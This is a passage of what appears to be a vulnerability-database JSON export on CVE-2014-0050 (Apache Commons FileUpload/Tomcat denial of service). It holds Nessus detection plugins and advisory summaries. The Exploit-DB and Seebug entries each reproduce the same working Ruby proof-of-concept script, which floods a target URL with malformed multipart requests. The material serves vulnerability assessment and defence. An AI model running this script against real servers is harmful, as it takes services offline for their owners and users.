reference:\"tomcat-el-2.2-api-7.0.41-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"tomcat-javadoc-7.0.41-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"tomcat-jsp-2.2-api-7.0.41-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"tomcat-jsvc-7.0.41-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"tomcat-lib-7.0.41-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"tomcat-servlet-3.0-api-7.0.41-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"tomcat-webapps-7.0.41-1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-01T07:00:05", "description": "The version of VMware vCenter Orchestrator installed on the remote\nhost is 5.5.x prior to 5.5.2. It is, therefore, affected by a denial\nof service vulnerability due to an error that exists in the included\nApache Tomcat version related to handling 'Content-Type' HTTP headers\nand multipart requests.", "edition": 26, "published": "2014-10-24T00:00:00", "title": "VMware vCenter Orchestrator 5.5.x < 5.5.2 DoS (VMSA-2014-0007)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:vmware:vcenter_orchestrator"], "id": "VMWARE_ORCHESTRATOR_VMSA_2014_0007.NASL", "href": "https://www.tenable.com/plugins/nessus/78671", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78671);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\"CVE-2014-0050\");\n script_bugtraq_id(65400);\n script_xref(name:\"VMSA\", value:\"2014-0007\");\n\n script_name(english:\"VMware vCenter Orchestrator 5.5.x < 5.5.2 DoS (VMSA-2014-0007)\");\n script_summary(english:\"Checks the version of VMware vCenter Orchestrator.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has a virtualization application installed that is\naffected by a denial of service vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware vCenter Orchestrator installed on the remote\nhost is 5.5.x prior to 5.5.2. It is, therefore, affected by a denial\nof service vulnerability due to an error that exists in the included\nApache Tomcat version related to handling 'Content-Type' HTTP headers\nand multipart requests.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2014-0007.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware vCenter Orchestrator 5.5.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0050\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/03/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:vcenter_orchestrator\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_vcenter_orchestrator_installed.nbin\");\n script_require_keys(\"installed_sw/VMware vCenter Orchestrator\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\napp_name = \"VMware vCenter Orchestrator\";\n\ninstall = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);\n\nversion = install['version'];\nverui = install['VerUI'];\npath = install['path'];\n\nif (version =~ '^5\\\\.5\\\\.')\n{\n build = install['Build'];\n if (empty_or_null(build)) exit(1, 'The ' + app_name + ' build number is missing.');\n\n if (int(build) < 1951762)\n {\n if (report_verbosity > 0)\n {\n report =\n '\\n Installed version : ' + verui +\n '\\n Fixed version : 5.5.2 Build 1951762' +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n }\n}\naudit(AUDIT_INST_PATH_NOT_VULN, app_name, verui, path);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:12:31", "description": "This update fixes a denial of service vulnerability which could be\ntriggered by specially crafted input if the buffer used by the\nMultipartSteeam was not big enough.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 13, "published": "2014-02-18T00:00:00", "title": "Fedora 20 : apache-commons-fileupload-1.3-5.fc20 (2014-2175)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "modified": "2014-02-18T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:apache-commons-fileupload", "cpe:/o:fedoraproject:fedora:20"], "id": "FEDORA_2014-2175.NASL", "href": "https://www.tenable.com/plugins/nessus/72544", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-2175.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(72544);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-0050\");\n script_bugtraq_id(65400);\n script_xref(name:\"FEDORA\", value:\"2014-2175\");\n\n script_name(english:\"Fedora 20 : apache-commons-fileupload-1.3-5.fc20 (2014-2175)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes a denial of service vulnerability which could be\ntriggered by specially crafted input if the buffer used by the\nMultipartSteeam was not big enough.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1062337\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-February/128499.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a6ea25eb\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache-commons-fileupload package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:apache-commons-fileupload\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/02/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/02/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"apache-commons-fileupload-1.3-5.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache-commons-fileupload\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T15:48:46", "description": "The version of IBM WebSphere Portal on the remote host is affected by\na denial of service vulnerability in the Apache Commons FileUpload\nlibrary that allows an attacker to cause the application to enter an\ninfinite loop.", "edition": 25, "published": "2014-06-03T00:00:00", "title": "IBM WebSphere Portal Apache Commons FileUpload DoS", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "modified": "2014-06-03T00:00:00", "cpe": ["cpe:/a:ibm:websphere_portal"], "id": "WEBSPHERE_PORTAL_CVE-2014-0050.NASL", "href": "https://www.tenable.com/plugins/nessus/74293", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(74293);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-0050\");\n script_bugtraq_id(65400);\n script_xref(name:\"EDB-ID\", value:\"31615\");\n\n script_name(english:\"IBM WebSphere Portal Apache Commons FileUpload DoS\");\n script_summary(english:\"Checks for installed patches.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has web portal software installed that is\naffected by a denial of service vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of IBM WebSphere Portal on the remote host is affected by\na denial of service vulnerability in the Apache Commons FileUpload\nlibrary that allows an attacker to cause the application to enter an\ninfinite loop.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www-01.ibm.com/support/docview.wss?uid=swg21672575\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www-01.ibm.com/support/docview.wss?uid=swg24029452#CF028\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www-01.ibm.com/support/docview.wss?uid=swg24034497#CF12\");\n # https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin_fixes_available_for_vulnerability_in_apache_commons_fileupload_contained_in_ibm_websphere_portal_cve_2014_0050?lang=en_us\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?12fd87aa\");\n script_set_attribute(attribute:\"solution\", value:\n\"For 6.1.x, first upgrade to either : Fix Pack 6.1.0.6 CF27 or Fix Pack\n6.1.5.3 CF27; then apply Interim Fixes PI14025, PI14027, PI14028,\nPI14029, PI14086, PI14150, PI14812, PI15187, and PI17908.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0050\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/05/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:ibm:websphere_portal\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"websphere_portal_installed.nbin\");\n script_require_keys(\"installed_sw/IBM WebSphere Portal\");\n\n exit(0);\n}\n\ninclude(\"websphere_portal_version.inc\");\n\nefixes = \"PI14025, PI14027, PI14028, PI14029, PI14086, PI14150, PI14812, PI15187, PI17908\";\n\nwebsphere_portal_check_version(\n checks:make_array(\n \"6.1.5.0, 6.1.5.3, CF27\", make_list(efixes),\n \"6.1.0.0, 6.1.0.6, CF27\", make_list(efixes),\n \"6.0.0.0, 6.0.0.1\", make_list(efixes)\n ),\n severity:SECURITY_HOLE\n);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-14T19:09:32", "description": "According to its self-reported version number, the instance of Apache\nTomcat 8.0.x listening on the remote host is a version prior to 8.0.3.\nIt is, therefore, affected by a denial of service vulnerability due to\nan error related to handling 'Content-Type' HTTP headers and multipart\nrequests such as file uploads.\n\nNote that this error exists because of the bundled version of Apache\nCommons FileUpload.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.", "edition": 18, "cvss3": {"score": 5.3, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"}, "published": "2014-02-25T00:00:00", "title": "Apache Tomcat 8.0.x < 8.0.3 Content-Type DoS", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "modified": "2014-02-25T00:00:00", "cpe": ["cpe:/a:apache:tomcat"], "id": "TOMCAT_8_0_3.NASL", "href": "https://www.tenable.com/plugins/nessus/72693", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(72693);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/11\");\n\n script_cve_id(\"CVE-2014-0050\");\n script_bugtraq_id(65400);\n script_xref(name:\"EDB-ID\", value:\"31615\");\n\n script_name(english:\"Apache Tomcat 8.0.x < 8.0.3 Content-Type DoS\");\n script_summary(english:\"Checks the Apache Tomcat version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Apache Tomcat server is affected by a denial of service\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the instance of Apache\nTomcat 8.0.x listening on the remote host is a version prior to 8.0.3.\nIt is, therefore, affected by a denial of service vulnerability due to\nan error related to handling 'Content-Type' HTTP headers and multipart\nrequests such as file uploads.\n\nNote that this error exists because of the bundled version of Apache\nCommons FileUpload.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://tomcat.apache.org/security-8.html#Fixed_in_Apache_Tomcat_8.0.3\");\n # http://mail-archives.apache.org/mod_mbox/www-announce/201402.mbox/%3C52F373FC.9030907@apache.org%3E\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?358ef049\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update to Apache Tomcat version 8.0.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0050\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/02/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/02/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:tomcat\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"tomcat_error_version.nasl\", \"tomcat_win_installed.nbin\", \"apache_tomcat_nix_installed.nbin\");\n script_require_keys(\"installed_sw/Apache Tomcat\");\n\n\n exit(0);\n}\n\ninclude(\"tomcat_version.inc\");\n\n# Note that 8.0.2 contained the fix,\n# but was never released.\ntomcat_check_version(fixed:\"8.0.2\", min:\"8.0.0\", severity:SECURITY_HOLE, granularity_regex:\"^8(\\.0)?$\");\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-03T15:04:57", "description": "Apache Commons FileUpload and Apache Tomcat - Denial-of-Service. CVE-2014-0050. Dos exploits for multiple platform", "published": "2014-02-12T00:00:00", "type": "exploitdb", "title": "Apache Commons FileUpload and Apache Tomcat - Denial-of-Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0050"], "modified": "2014-02-12T00:00:00", "id": "EDB-ID:31615", "href": "https://www.exploit-db.com/exploits/31615/", "sourceData": "#################################################################################\r\n# CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat Denial-of-Service\t#\r\n# \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#\r\n# Author: Oren Hafif, Trustwave SpiderLabs Research\t\t\t\t\t\t\t\t#\r\n# This is a Proof of Concept code that was created for the sole purpose \t\t#\r\n# of assisting system administrators in evaluating whether their applications \t#\r\n# are vulnerable to this issue or not\t\t\t\t\t\t\t\t\t\t\t#\r\n# \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#\r\n# Please use responsibly.\t\t\t\t\t\t\t\t\t\t\t\t\t\t#\r\n#################################################################################\r\n\r\n\r\nrequire 'net/http'\r\nrequire 'net/https'\r\nrequire 'optparse'\r\nrequire 'openssl'\r\n\r\n\r\noptions = {}\r\n\r\nopt_parser = OptionParser.new do |opt|\r\n opt.banner = \"Usage: ./CVE-2014-0050.rb [OPTIONS]\"\r\n opt.separator \"\"\r\n opt.separator \"Options\"\r\n opt.on(\"-u\",\"--url URL\",\"The url of the Servlet/JSP to test for Denial of Service\") do |url|\r\n options[:url] = url\r\n end\r\n\r\n opt.on(\"-n\",\"--number_of_requests NUMBER_OF_REQUSETS\",\"The number of requests to send to the server. The default value is 10\") do |number_of_requests|\r\n options[:number_of_requests] = number_of_requests\r\n end\r\n\r\n opt.on(\"-h\",\"--help\",\"help\") do\r\n \tputs \"\"\r\n puts \"#################################################################################\"\r\n\tputs \"# CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat Denial-of-Service #\"\r\n\tputs \"# #\"\r\n\tputs \"# Author: Oren Hafif, Trustwave SpiderLabs Research #\"\r\n\tputs \"# This is a Proof of Concept code that was created for the sole purpose #\"\r\n\tputs \"# of assisting system administrators in evaluating whether or not #\"\r\n\tputs \"# their applications are vulnerable to this issue. #\"\r\n\tputs \"# #\"\r\n\tputs \"# Please use responsibly. #\"\r\n\tputs \"#################################################################################\"\r\n puts \"\"\r\n puts opt_parser\r\n puts \"\"\r\n \r\n\texit\r\n end\r\nend\r\n\r\nopt_parser.parse!\r\n\r\n\r\nuri = \"\"\r\nbegin\r\n\turi = URI.parse(options[:url])\r\nrescue Exception => e\r\n\tputs \"\"\r\n\tputs \"ERROR: Invalid URL was entered #{options[:url]}\"\r\n\tputs \"\"\r\n puts opt_parser\r\n exit\r\nend\r\n\r\nnumber_of_requests = 10;\r\nif(options[:number_of_requests] != nil)\r\n\tbegin\r\n\t\tnumber_of_requests = Integer( options[:number_of_requests] )\r\n\t\tthrow Exception.new if number_of_requests <= 0 \r\n\trescue Exception => e\r\n\t\tputs e\r\n\t\tputs \"\"\r\n\t\tputs \"ERROR: Invalid NUMBER_OF_REQUSETS was entered #{options[:number_of_requests]}\"\r\n\t\tputs \"\"\r\n\t puts opt_parser\r\n\t exit\r\n\tend\r\nend\r\n\r\n#uri = URI.parse(uri)\r\n\r\n\r\nputs \"\"\r\nputs \"WARNING: Usage of this tool for attack purposes is forbidden - press Ctrl-C now to abort...\"\r\ni=10\r\ni.times { print \"#{i.to_s}...\";sleep 1; i-=1;}\r\nputs \"\"\r\n\r\n\r\nnumber_of_requests.times do \r\n\tbegin\r\n\tputs \"Request Launched\"\r\n\thttps = Net::HTTP.new(uri.host,uri.port)\r\n\thttps.use_ssl = uri.scheme==\"https\"\r\n\thttps.verify_mode = OpenSSL::SSL::VERIFY_NONE\r\n\treq = Net::HTTP::Post.new(uri.path)\r\n\treq.add_field(\"Content-Type\",\"multipart/form-data; boundary=#{\"a\"*4092}\")\r\n\treq.add_field(\"lf-None-Match\",\"59e532f501ac13174dd9c488f897ee75\")\r\n\treq.body = \"b\"*4097\r\n\thttps.read_timeout = 1 \r\n\tres = https.request(req)\r\n\trescue Timeout::Error=>e\r\n\t\tputs \"Timeout - continuing DoS...\"\r\n\trescue Exception=>e\r\n\t\tputs e.inspect\r\n\tend\r\nend\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/31615/"}], "suse": [{"lastseen": "2016-09-04T11:49:41", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0050"], "description": "This update fixes a security issue with\n jakarta-commons-fileupload:\n\n * bnc#862781: denial of service due to too-small buffer\n size used (CVE-2014-0050)\n", "edition": 1, "modified": "2014-04-17T21:04:15", "published": "2014-04-17T21:04:15", "id": "SUSE-SU-2014:0548-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-04/msg00015.html", "title": "Security update for jakarta-commons-fileupload (important)", "type": "suse", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "seebug": [{"lastseen": "2017-11-19T16:36:25", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Apache Commons FileUpload and Apache Tomcat - Denial-of-Service", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0050"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-84935", "id": "SSV:84935", "sourceData": "\n #################################################################################\r\n# CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat Denial-of-Service\t#\r\n# \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#\r\n# Author: Oren Hafif, Trustwave SpiderLabs Research\t\t\t\t\t\t\t\t#\r\n# This is a Proof of Concept code that was created for the sole purpose \t\t#\r\n# of assisting system administrators in evaluating whether their applications \t#\r\n# are vulnerable to this issue or not\t\t\t\t\t\t\t\t\t\t\t#\r\n# \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#\r\n# Please use responsibly.\t\t\t\t\t\t\t\t\t\t\t\t\t\t#\r\n#################################################################################\r\n\r\n\r\nrequire 'net/http'\r\nrequire 'net/https'\r\nrequire 'optparse'\r\nrequire 'openssl'\r\n\r\n\r\noptions = {}\r\n\r\nopt_parser = OptionParser.new do |opt|\r\n opt.banner = "Usage: ./CVE-2014-0050.rb [OPTIONS]"\r\n opt.separator ""\r\n opt.separator "Options"\r\n opt.on("-u","--url URL","The url of the Servlet/JSP to test for Denial of Service") do |url|\r\n options[:url] = url\r\n end\r\n\r\n opt.on("-n","--number_of_requests NUMBER_OF_REQUSETS","The number of requests to send to the server. The default value is 10") do |number_of_requests|\r\n options[:number_of_requests] = number_of_requests\r\n end\r\n\r\n opt.on("-h","--help","help") do\r\n \tputs ""\r\n puts "#################################################################################"\r\n\tputs "# CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat Denial-of-Service #"\r\n\tputs "# #"\r\n\tputs "# Author: Oren Hafif, Trustwave SpiderLabs Research #"\r\n\tputs "# This is a Proof of Concept code that was created for the sole purpose #"\r\n\tputs "# of assisting system administrators in evaluating whether or not #"\r\n\tputs "# their applications are vulnerable to this issue. #"\r\n\tputs "# #"\r\n\tputs "# Please use responsibly. #"\r\n\tputs "#################################################################################"\r\n puts ""\r\n puts opt_parser\r\n puts ""\r\n \r\n\texit\r\n end\r\nend\r\n\r\nopt_parser.parse!\r\n\r\n\r\nuri = ""\r\nbegin\r\n\turi = URI.parse(options[:url])\r\nrescue Exception => e\r\n\tputs ""\r\n\tputs "ERROR: Invalid URL was entered #{options[:url]}"\r\n\tputs ""\r\n puts opt_parser\r\n exit\r\nend\r\n\r\nnumber_of_requests = 10;\r\nif(options[:number_of_requests] != nil)\r\n\tbegin\r\n\t\tnumber_of_requests = Integer( options[:number_of_requests] )\r\n\t\tthrow Exception.new if number_of_requests <= 0 \r\n\trescue Exception => e\r\n\t\tputs e\r\n\t\tputs ""\r\n\t\tputs "ERROR: Invalid NUMBER_OF_REQUSETS was entered #{options[:number_of_requests]}"\r\n\t\tputs ""\r\n\t puts opt_parser\r\n\t exit\r\n\tend\r\nend\r\n\r\n#uri = URI.parse(uri)\r\n\r\n\r\nputs ""\r\nputs "WARNING: Usage of this tool for attack purposes is forbidden - press Ctrl-C now to abort..."\r\ni=10\r\ni.times { print "#{i.to_s}...";sleep 1; i-=1;}\r\nputs ""\r\n\r\n\r\nnumber_of_requests.times do \r\n\tbegin\r\n\tputs "Request Launched"\r\n\thttps = Net::HTTP.new(uri.host,uri.port)\r\n\thttps.use_ssl = uri.scheme=="https"\r\n\thttps.verify_mode = OpenSSL::SSL::VERIFY_NONE\r\n\treq = Net::HTTP::Post.new(uri.path)\r\n\treq.add_field("Content-Type","multipart/form-data; boundary=#{"a"*4092}")\r\n\treq.add_field("lf-None-Match","59e532f501ac13174dd9c488f897ee75")\r\n\treq.body = "b"*4097\r\n\thttps.read_timeout = 1 \r\n\tres = https.request(req)\r\n\trescue Timeout::Error=>e\r\n\t\tputs "Timeout - continuing DoS..."\r\n\trescue Exception=>e\r\n\t\tputs e.inspect\r\n\tend\r\nend\r\n\n ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-84935"}, {"lastseen": "2017-11-19T17:35:36", "description": "BUGTRAQ ID: 65400\r\nCVE(CAN) ID: CVE-2014-0050\r\n\r\nApache Commons FileUpload\u8f6f\u4ef6\u5305\u53ef\u4ee5\u5411\u5c0f\u670d\u52a1\u7a0b\u5e8f\u548cWeb\u5e94\u7528\u6dfb\u52a0\u9ad8\u6027\u80fd\u7684\u6587\u4ef6\u4e0a\u4f20\u529f\u80fd\u3002Apache Tomcat\u662f\u4e00\u4e2a\u6d41\u884c\u7684\u5f00\u653e\u6e90\u7801\u7684JSP\u5e94\u7528\u670d\u52a1\u5668\u7a0b\u5e8f\u3002\r\n\r\nApache\u5171\u4eab\u6587\u4ef6\u4e0a\u4f20\u5b58\u5728\u89e3\u6790\u7578\u5f62\u7684Content-Type\u5934\u65f6\u5b58\u5728\u6f0f\u6d1e\uff0c\u4f7f\u7528\u7279\u5236\u7684\u8bf7\u6c42\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u80fd\u4f1a\u4f7f\u7a0b\u5e8f\u5d29\u6e83\u3002\n0\nCommons FileUpload 1.0-1.3\r\nApache Tomcat 8.0.0-RC1-8.0.1\r\nApache Tomcat 7.0.0-7.0.50\r\nApache Tomcat 6\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nApache\r\n-----\r\n\u5347\u7ea7\u5230Commons FileUpload 1.3.1, \u6216\u8005Tomcat 8.0.2, 7.0.51\u53ca\u66f4\u9ad8\u7248\u672c\u4fee\u590d\u6b64\u6f0f\u6d1e\uff1a\r\n\r\nhttp://commons.apache.org/", "published": "2014-02-13T00:00:00", "type": "seebug", "title": "Apache Commons FileUpload/Apache Tomcat\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e", "bulletinFamily": "exploit", 